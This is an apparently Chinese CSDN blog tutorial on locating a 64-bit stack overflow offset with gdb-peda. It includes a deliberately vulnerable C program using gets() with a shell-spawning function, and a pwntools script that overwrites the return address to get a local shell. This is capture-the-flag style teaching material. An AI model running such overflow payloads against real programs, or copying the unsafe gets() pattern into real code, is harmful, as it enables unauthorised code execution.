gbd调试64位程序关键

最新推荐文章于 2021-03-22 22:17:44 发布
最新推荐文章于 2021-03-22 22:17:44 发布
阅读量336 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/105123334
版权

程序:
4.c:

#include<stdio.h>
void exploit()
{
	system("/bin/sh");
}
void main()
{
    char buf[20];
    gets(buf); 
}

编译:

gcc -no-pie -fno-stack-protector  -m64 -o 4.exe 4.c

在这里插入图片描述
NX保护,栈数据不可执行
在这里插入图片描述
使用命令,开始调试

gdb 4.exe
start

我们来看看寄存器,相比较32位,32位的寄存器的E变成R就是64位的寄存器了。还有64位多了8个寄存器,R8~R15
在这里插入图片描述
64位如何定位到溢出点?

使用peda生成100个字符

pattern_create 100

在这里插入图片描述
r运行程序,把生成的字符串输进去,会发现程序溢出,32位我们是取看EIP找溢出点,我们看看64位的RIP
在这里插入图片描述
发现RIP没有我们需要的溢出字符串,所以64不能看RIP定位溢出点,需要看RSP。这个时候我们需要取RSP值的前4位,就是溢出点。
在这里插入图片描述
我们查找一下,发现是40位
在这里插入图片描述
构造我们的poc:
查看exploit函数地址:
在这里插入图片描述

# -*- coding: utf-8 -*-
from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=process('./4.exe')
offset = 40
payload ='a'*offset+p64(0x401132)
#payload ='a'*offset+p64(0x401030) +p64(0x400000)+p64(0x68732f6e69622f)

p.sendline(payload)
p.interactive()

执行,获得权限
在这里插入图片描述

p0inter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Pwn】使用gdb附加调试64位程序
weixin_52553215的博客
05-17 1398
elf,是Linux的主要可执行文件格式 可通过 pwntools的gdb模块 完成 elf文件的动态调试工作 例: 编译:各种保护都不加 其中最常用的还是attach函数,在指定process之后可以attach上去调试,配合proc模块就可以得到对应进程的pid非常方便。 pwntools开发脚本时如何调试: 1、使用proc.pidof(p)函数先将被测函数的PID打印出来; 2、用GDB Attach上去调试即可。 ...
64位linux 兼容32位程序,linux的64位操作系统对32位程序的兼容-全面分析
weixin_35658042的博客
05-07 505
1.结构体ioctl_trans:struct ioctl_trans {unsigned long cmd;ioctl_trans_handler_t handler;struct ioctl_trans *next;};该结构体提供了一个粘合层,用户可以动态注册一个ioctl_trans以便其提供64位32位的粘合:extern int register_ioctl32_conversion...
gdb调试64位程序
fanghuapyk的博客
03-19 570
首先看一下程序源码,要是我们的程序调用system函数 #include <stdio.h> void exploit(){ system("/bin/sh"); } void main(){ char buf[20]; gets(buf); } 我们用到两个窗口,一个调试,另一个运行脚本 首先看一下保护模式,什么都没有开启 1,先用objdump –d –M intel ./test 命令查看所有的汇编代码 我们要执行的程序在这里,我们要运行的函数是system函数,并且带参数bin/
gdb64.exe 调试
02-10
找了很久才找到的gdb64 for windows 64bit,2积分不多。
GO语言gdb.exe 64位
11-17
eclipse下配置GO语言的开发环境,配置gdb.exe,下载gdb64.exe,然后解压文件,找到bin目录下的gdb文件,根据自己电脑的操作系统选择32位或者64位的文件,我这边是64位的系统,所以就选择gdb64.exe到Go安装目录的bin文件下
64位调试工具
12-25
64位调试反编译工具。替代OD的存在!图形化调试、汉化版。
gbd调试程序
07-26
### GBD调试程序知识点详解 #### 一、GDB简介及功能 **GDB**(GNU Debugger)是一款由GNU开源组织发布的强大调试工具,适用于多种类UNIX系统,如Linux、BSD等。它允许用户对程序进行细致入微的调试,支持多样的...
GBD(linux下的程序调试).pdf
10-24
GDB(GNU Debugger)是GNU项目下的一款强大而灵活的程序调试工具,适用于多种操作系统,包括但不限于Linux。它支持多种编程语言,如C、C++等。GDB允许开发者以命令行的方式对程序进行调试,提供了一种高效且灵活的...
gbd
03-04
3. **差异分析**:除了简单的比较,`gbd`可能还支持对二进制文件的差异进行分析,帮助找出导致变化的关键部分。 4. **集成于Git**:作为一个Git插件,`gbd`可能与Git的命令行工具紧密集成,允许用户通过熟悉的Git...
用 GDB 调试程序
08-29
### 使用GDB调试程序:深入理解与实践 #### 引言 GDB(GNU Debugger)是Linux系统下的一款强大而全面的调试工具,主要用于调试C和C++编写的程序。通过GDB,开发者可以在程序运行时监控其内部状态,包括变量的值、...
GDB.EXE MinGW安装包缺少GBD文件
10-22
标题中的“GDB.EXE MinGW安装包缺少GBD文件”指出了一个常见问题,即在尝试安装MinGW(Minimalist GNU for Windows)开发环境时,发现GDB(GNU调试器)的可执行文件缺失或者不完整。GDB是C、C++等语言的重要调试工具...
64位调试
qq_39249347的博客
08-31 1106
64位环境中,32位进程与64位进程彼此共存,所以在64位环境中应当能够调试PE32与PE32+这2种文件。 IA-64搭载于高性能服务器,我们一般不接触到,由于WinDbg于IDA Pro都支持x64与IA-64,所以可用正常使用它们调试IA-64. x64环境下的调试器 Windows 64位OS不仅可用运行64位进程(PE32+类型),还可以同时运行32位进程。 在32位OS种无法调试PE32+文件,但是使用IDA Pro可用查看PE32+文件的反汇编代码,另外,OllyDbg调试器并不支持.
gdb调试技巧 32位64位
leafrench1的博客
11-27 2716
apple:socket apple$ gcc test64.c apple:socket apple$ ./a.out __x86_64__apple:socket apple$ apple:socket apple$ gcc -m32 test64.c apple:socket apple$ ./a.out __i386__apple:socket apple$ 代码如...
[PWN][进阶篇]使用GDB附加调试64位程序
网络安全知识分享
03-22 7658
使用GDB附加调试64位程序 pwntools开发脚本时如何调试: 1、使用proc.pidof§函数先将被测函数的PID打印出来 2、 用GDB Attach上去调试即可 本次实验的代码如下:
gdb 查看是否 栈溢出_64位Linux栈溢出教程
weixin_39782355的博客
01-17 798
0x01这一系列的文章目的在于快速介绍对缓冲区溢出(在64位下linux二进制程序)弱点的利用。该系列教程适合人群为:熟悉利用32位二进制程序并想应用它们的知识来利用64位二进制程序。该教程是长期的零散笔记,整理总结成的结果。搭建环境在64位32位linux平台下编写其二进制的利用程序区别不大,然而我们将遇到一些陷阱,学习这种技术最好的方法是实践它,因此我鼓励你跟着教程一起实践。我将在Unbun...
64位程序调试关键
qq_44119514的博客
03-28 299
gdb pattern_create | pattern_offset
JacobTsang的博客
09-16 2993
gdb-peda$ pattern_create 200 gdb-peda$ pattern_offset 0x47414131 首先寻找多少字节能溢出切刚好能够覆盖return addr。我们使用gdb-peda提供的pattern_create和pattern_offset。pattern_create是生成一个字符串模板输入后根据EIP来确定覆盖return addr的长度。 cat /p...
程序: getPhoneNumber功能详解,获取手机号登录 2019
热门推荐
小林的博客
06-28 1万+
##内容 1.效果图 2.前端页面组件书写 3.JS内组件用法 4.接口文件内容 1.效果图: 2.小程序前端页面 <button open-type="getPhoneNumber" bindgetphonenumber="getPhoneNumber">点击登录</button> 使用小程序button按钮,按照官方文档写的,无需修改。官方文档:ht...
pwngdb的基本使用
weixin_43723991的博客
03-08 5244
pwngdb 文件名 : 调式文件 r 运行 disass 函数名 :查看函数的反汇编代码 b 函数名/*地址:下断点(地址前面要加**号) i (空格)b :查看断点 d(空格) 断点编号 :删除断点 ...
qt程序使用gbd调试
最新发布
06-15
使用gdb调试Qt程序的步骤如下: 1. 在Qt Creator中打开项目并编译。 2. 打开终端,进入Qt Creator项目的构建目录。 3. 在终端中输入命令:gdb ,其中是你的Qt项目的可执行文件名。 4. 在gdb中输入命令:run,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值